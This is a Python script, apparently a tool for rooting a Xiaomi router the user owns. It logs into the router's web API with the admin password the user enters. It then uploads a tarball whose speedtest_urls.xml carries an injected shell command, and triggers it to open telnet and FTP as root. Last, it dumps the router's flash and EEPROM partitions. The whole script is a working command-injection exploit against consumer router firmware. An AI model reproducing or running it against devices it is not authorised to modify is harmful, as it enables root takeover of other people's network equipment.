import os import sys import re import time import base64 import random import hashlib import requests import socket import subprocess import tarfile import ftplib import telnetlib # proxies = {"http":"http://127.0.0.1:8080"} proxies = {} command = "((sh /tmp/main.sh) &)" line4 = subprocess.check_output(["cmd","/c","chcp","437","&","tracert","-d","-h","1","1.1.1.1"]).decode().split("\r\n")[4].strip().split(" ") for data in line4: if len(data.split(".")) == 4: router_ip_address = data break def get_mac(): try: r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address), proxies=proxies) except: print ('No Xiaomi Router found ... Check the router performance and try again.') sys.exit(1) mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0] return mac def create_nonce(mac): type_ = 0 deviceId = mac time_ = int(time.time()) rand = random.randint(0,10000) return "%d_%s_%d_%d"%(type_, deviceId, time_, rand) def calc_password(nonce, account_str): m = hashlib.sha1() m.update((nonce + account_str).encode('utf-8')) return m.hexdigest() mac = get_mac() nonce = create_nonce(mac) account_str = calc_password(input("Enter your router password: "), 'a2ffa5c9be07488bbb04a3a47d3c5f6a') password = calc_password(nonce, account_str) data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce) r2 = requests.post("http://{router_ip_address}/cgi-bin/luci/api/xqsystem/login".format(router_ip_address=router_ip_address), data = data, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, proxies=proxies) stok = re.findall(r'"token":"(.*?)"',r2.text)[0] with open("template/speedtest_urls_template.xml","rt") as f: template = f.read() data = template.format(router_ip_address=router_ip_address,command=command) with open("main/speedtest_urls.xml",'wt',newline='\n') as f: f.write(data) with tarfile.open("main/payload.tar.gz", "w:gz") as tar: tar.add("main/speedtest_urls.xml", "speedtest_urls.xml") tar.add("main/main.sh", "main.sh") tar.add("main/busybox", "busybox") os.remove("main/speedtest_urls.xml") print("Uploading the exploit...") r3 = requests.post("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/misystem/c_upload".format(router_ip_address=router_ip_address,stok=stok), files={"image":open("main/payload.tar.gz",'rb')}, proxies=proxies) os.remove("main/payload.tar.gz") print("Enabling telnet and ftpd...") r4 = requests.get("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/xqnetdetect/netspeed".format(router_ip_address=router_ip_address,stok=stok), proxies=proxies) print("Successfully!") print('Creating a backup...') tn = telnetlib.Telnet(router_ip_address) tn.read_until(b"login:") tn.write(b"root\n") tn.read_until(b"root@XiaoQiang:~#") tn.write(b"dd if=/dev/mtd0 of=/tmp/backup.bin\n") tn.read_until(b"root@XiaoQiang:~#") ftp=ftplib.FTP(router_ip_address) with open('data/backup.bin', 'wb') as file: ftp.retrbinary(f'RETR /tmp/backup.bin', file.write) tn.write(b"rm /tmp/backup.bin\n") tn.read_until(b"root@XiaoQiang:~#") print('Backup created!') print('backup eeprom...') tn = telnetlib.Telnet(router_ip_address) tn.read_until(b"login:") tn.write(b"root\n") tn.read_until(b"root@XiaoQiang:~#") tn.write(b"dd if=/dev/mtd3 of=/tmp/eeprom.bin\n") tn.read_until(b"root@XiaoQiang:~#") ftp=ftplib.FTP(router_ip_address) with open('data/eeprom.bin', 'wb') as file: ftp.retrbinary(f'RETR /tmp/eeprom.bin', file.write) tn.write(b"rm /tmp/eeprom.bin\n") tn.read_until(b"root@XiaoQiang:~#") print('eeprom backuped!')